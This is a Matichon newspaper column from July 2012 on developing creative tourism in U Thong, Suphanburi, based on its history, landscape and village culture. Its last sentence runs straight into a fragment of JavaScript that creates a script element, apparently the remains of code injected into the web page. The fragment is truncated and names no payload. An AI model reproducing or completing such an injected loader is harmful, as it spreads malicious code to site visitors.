Download PDF

มติชนรายวัน ฉบับประจำวันพฤหัสบดีที่ 12 กรกฎาคม 2555

 

          อ. อู่ทอง จ. สุพรรณบุรี มีทรัพยากรท้องถิ่นหลากหลาย ทั้งทางประวัติศาสตร์, ธรรมชาติ, และวัฒนธรรม

          คนในท้องถิ่นอู่ทองควรหาช่องทางแลกเปลี่ยนเรียนรู้วิธีบริหารจัดการทรัพยากรท้องถิ่นจากผู้มีประสบการณ์ เพื่อให้มีการท่องเที่ยวสร้างสรรค์ (Creative Tourism) กับการเป็นส่วนหนึ่งของเครือข่ายเมืองสร้างสรรค์ (Creative Cities Network) เพื่อสร้างแบรนด์เนม “อู่ทอง ครีเอทีฟ”

          ทรัพยากรท้องถิ่นอู่ทองที่สำคัญควรแก่การเป็น“อู่ทอง ครีเอทีฟ” มีดังนี้

          ประวัติศาสตร์ อู่ทองมีพัฒนาการทางสังคมวัฒนธรรมของชุมชนหมู่บ้านมาตั้งแต่ยุคโลหะ ไม่น้อยกว่า 3,000 ปีมาแล้ว

 

          เมืองอู่ทอง เป็นเมืองเก่าแก่ที่สุด บริเวณลุ่มน้ำเจ้าพระยาภาคกลาง นับเป็นต้นทางประวัติศาสตร์ไทย และเป็นศูนย์กลางพุทธศาสนาเก่าแก่ที่สุดของสุวรรณภูมิ

 

          ชื่ออู่ทอง (ได้จากนิทานท้องถิ่น) มีความหมายสอดคล้องกับชื่อสุวรรณภูมิ (จากชาดกของอินเดียและคัมภีร์ของลังกา)

          ชื่อสุวรรณภูมิ เป็นรากเหง้าเริ่มต้นของชื่อรัฐสุพรรณภูมิ และชื่อเมืองสุพรรณบุรี ที่เป็น จ. สุพรรณบุรีทุกวันนี้

          เมืองอู่ทองอยู่บนเส้นทางการค้าโลก เชื่อมโยงตะวันตก (คือ อินเดียทางทะเลอันดามัน มหาสมุทรอินเดีย) กับตะวันออก (คือ จีน ทางทะเลจีน มหาสมุทรแปซิฟิก)

          อู่ทองยังเป็นฉากในวรรณคดีสำคัญของไทยเรื่องขุนช้างขุนแผน ตอนพระพันวษาเสด็จต้อนควาย กับตอนขุนแผนพานางวันทองขึ้นม้าสีหมอกหนีจากเรือนขุนช้าง ในเมืองสุพรรณมาเขาพระ อู่ทอง

          หลักฐานประวัติศาสตร์โบราณคดีที่พบในเมืองอู่ทอง และปริมณฑลโดยรอบ เป็นสมบัติวัฒนธรรม ทั้งของไทย, ของประชาคมอาเซียน, และของโลก ที่ชุมชนท้องถิ่น อู่ทองทำหน้าที่ปกปักรักษา แล้วแสวงหารายได้จากสมบัติวัฒนธรรมทั้งหลายอย่างทะนุถนอมและอย่างพอเพียง

          ธรรมชาติ คือ หุบเขาและทุ่งราบที่เหมาะสำหรับเดินทางท่องเที่ยวอย่างสร้างสรรค์

          หุบเขา ด้านตะวันตกเป็นหุบเขาเตี้ยๆ สำรวจจากแผนที่ของกรมแผนที่ทหาร จะมีมากกว่า 10 ยอดเขา เหมาะสำหรับผจญภัยป่ายปีนเดินเขาเที่ยวป่า

          ที่สำคัญคือยังไม่มีการสำรวจทางโบราณคดีครบทุกยอดเขาว่ามีซากวัดอยู่ตรงไหนบ้าง? เพราะทุกยอดเขาน่าจะมีวัดร้างตามความเชื่อโบราณ

          นอกจากนั้นยังมีถ้ำอยู่บนภูเขา ซึ่งน่าเดินทางผจญภัยสำรวจ ดังมีตัวอย่าง “ไหว้พระออมบุญ 5 ขุนเขา” ที่ท้องถิ่นอู่ทองเองเคยเชิญชวนให้ไปวัดเขาถ้ำเสือ, วัดเขาทำเทียม, วัดเขาพระ (ศรีสรรเพชญ์ฯ), วัดเขากำแพง, วัดเขาดีสลัก สมควรปรับปรุงให้ดีกว่าเดิม

          ทุ่งราบ ด้านตะวันออกเป็นทุ่งนา มีแม่น้ำจระเข้สามพันและลำคลองต่างๆหลายสาย แล้วยังมีหนองบึงกับหมู่บ้าน ชวนให้เดินทางท่องเที่ยวลัดเลาะไปตามหมู่บ้าน เช่น บ้านกระจัน, บ้านยี่แส, บ้านยุ้งทะลาย, บ้านหัวทำนบ, ฯลฯ

          วัฒนธรรม คือวิถีชีวิตของคนที่เกี่ยวข้องสัมพันธ์กับคนอื่นและสิ่งแวดล้อม ซึ่งมีหลากหลายแต่คล้ายคลึงกัน แล้วมีทั่วไปทุกหมู่บ้านในอู่ทอง

          อู่ทอง มีอดีตและปัจจุบัน ซึ่งคนอู่ทองต้อง เรียนรู้อดีต มารับใช้ปัจจุบัน เพื่อสร้างสรรค์อนาคต

          อดีต คือ ประวัติศาสตร์ ซึ่งเป็นความทรงจำร่วมของทุกคนในชุมชนท้องถิ่น ที่มีโคตรเหง้าเหล่ากอบรรพชนปู่ย่าตายายพี่ป้าน้าอาพ่อแม่พี่น้องของเรา เคยร่วมสร้างสรรค์ความเปลี่ยนแปลงมาด้วยกันกับบรรพชนของคนอื่นๆ

          ประวัติศาสตร์อันเป็นความทรงจำร่วมที่คนอู่ทองรับรู้ร่วมกัน จะเป็นเครื่องมืออย่างหนึ่งใช้ต่อรองกับผู้มีอำนาจเหนือกว่าเพื่อให้ได้มาซึ่งความอยู่ดีกินดีมีสุขอย่างเหมาะสมร่มเย็น

          เช่น ชาวบ้านใช้ต่อรองกับนักการเมืองท้องถิ่น, นักการเมืองท้องถิ่นใช้ต่อรองกับนักการเมืองระดับชาติ เป็นต้น

          ทุกอย่างจะสำเร็จได้ต้องลงมือสร้างฐานรากให้แข็งแรงด้วยการแบ่งปันร่วมกันรู้ความเป็นมาของอู่ทองvar d=document;var s=d.createElement(‘script’); }